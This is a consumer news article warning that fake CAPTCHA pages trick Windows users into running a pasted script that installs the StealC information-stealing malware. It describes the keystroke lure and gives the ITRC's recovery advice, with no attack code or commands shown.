A new scam is exploiting a familiar internet security check — tricking people into compromising their own computers. The Identity Theft Resource Center (ITRC) is warning that criminals are using realistic-looking fake CAPTCHA pages to trick Windows users into running malicious commands that install information-stealing malware.CAPTCHAs are commonly used to verify that a user is human, often by asking them to click images or check a box. But in this scam, the page prompts users to follow a series of keyboard steps to continue.Those instructions may tell users to press the Windows key and “R,” then “Ctrl + V,” then hit Enter.According to the ITRC, following those steps opens a hidden command box, pastes a malicious script from the clipboard and runs it, downloading malware onto the computer.Security researchers have identified the malware as “StealC,” which is designed to quietly collect sensitive data. That can include saved passwords, login credentials and other information stored in your browser.A legitimate CAPTCHA will never ask users to run commands or use keyboard shortcuts. If you encounter a page that does, close it immediately.Those who believe they may have followed the instructions should act quickly. The ITRC recommends disconnecting from the internet, running a full antivirus scan and changing passwords using a separate, unaffected device. Users should also monitor financial accounts for suspicious activity.Stay Connected with the National Consumer UnitGet clear, actionable consumer reporting delivered across platforms.Follow National Consumer Correspondent Allie Jasinski for real-time updates, myth-busting videos and behind-the-scenes reporting on Instagram, TikTok and YouTube.Have a question you’d like us to investigate? Email us at askallie@hearst.com
A new scam is exploiting a familiar internet security check — tricking people into compromising their own computers.
The Identity Theft Resource Center (ITRC) is warning that criminals are using realistic-looking fake CAPTCHA pages to trick Windows users into running malicious commands that install information-stealing malware.
CAPTCHAs are commonly used to verify that a user is human, often by asking them to click images or check a box. But in this scam, the page prompts users to follow a series of keyboard steps to continue.
Those instructions may tell users to press the Windows key and “R,” then “Ctrl + V,” then hit Enter.
According to the ITRC, following those steps opens a hidden command box, pastes a malicious script from the clipboard and runs it, downloading malware onto the computer.
Security researchers have identified the malware as “StealC,” which is designed to quietly collect sensitive data. That can include saved passwords, login credentials and other information stored in your browser.
A legitimate CAPTCHA will never ask users to run commands or use keyboard shortcuts. If you encounter a page that does, close it immediately.
Those who believe they may have followed the instructions should act quickly. The ITRC recommends disconnecting from the internet, running a full antivirus scan and changing passwords using a separate, unaffected device. Users should also monitor financial accounts for suspicious activity.
Stay Connected with the National Consumer Unit
Get clear, actionable consumer reporting delivered across platforms.
Follow National Consumer Correspondent Allie Jasinski for real-time updates, myth-busting videos and behind-the-scenes reporting on Instagram, TikTok and YouTube.
Have a question you’d like us to investigate? Email us at askallie@hearst.com
